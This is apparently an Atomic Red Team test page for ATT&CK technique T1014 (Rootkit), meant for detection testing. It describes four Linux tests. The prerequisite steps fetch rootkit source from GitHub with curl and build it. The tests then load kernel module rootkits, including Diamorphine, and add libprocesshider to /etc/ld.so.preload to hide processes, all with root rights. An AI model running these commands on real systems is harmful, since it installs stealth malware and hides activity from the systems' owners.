T1014
Rootkit
Description from ATT&CK
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
Atomic Tests
Atomic Test #1 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
Supported Platforms: linux
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux |
rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin |
rootkit_name | Module name | string | T1014 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
sudo insmod #{rootkit_path}/#{rootkit_name}.ko
Cleanup Commands:
1
2
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
Dependencies: Run with bash!
Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
Check Prereq Commands:
1
if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
6
7
8
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp #{rootkit_source_path}/* /tmp/T1014/
cd /tmp/T1014; make
mkdir #{rootkit_path}
mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014
Atomic Test #2 - Loadable Kernel Module based Rootkit
Loadable Kernel Module based Rootkit
Supported Platforms: linux
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux |
rootkit_name | Module name | string | T1014 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
sudo modprobe #{rootkit_name}
Cleanup Commands:
1
2
3
sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a
Dependencies: Run with bash!
Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
Check Prereq Commands:
1
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
6
7
8
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;
cp #{rootkit_source_path}/* /tmp/T1014
cd /tmp/T1014; make
sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014
sudo depmod -a
Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
Supported Platforms: linux
auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
repo | Url of the github repo zip | string | https://github.com/gianlucaborello/libprocesshider/ |
rev | Revision of the github repo zip | string | 25e0587d6bf2137f8792dc83242b6b0e5a72b415 |
library_path | Full path of the library to add to ld.so.preload | string | /usr/local/lib/libprocesshider.so |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
Cleanup Commands:
1
2
sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
Dependencies: Run with bash!
Description: The preload library must exist on disk at specified location (#{library_path})
Check Prereq Commands:
1
if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
make
cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py
Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
Loads Diamorphine kernel module, which hides itself and a processes.
Supported Platforms: linux
auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
repo | Url of the diamorphine github repo | string | https://github.com/m0nad/Diamorphine/ |
rev | Revision of the github repo zip | string | 898810523aa2033f582a4a5903ffe453334044f9 |
rootkit_name | Module name | string | diamorphine |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
4
5
sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"
Cleanup Commands:
1
2
3
4
kill -63 1
sudo modprobe -r #{rootkit_name}
sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a
Dependencies: Run with bash!
Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
Check Prereq Commands:
1
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
make
sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a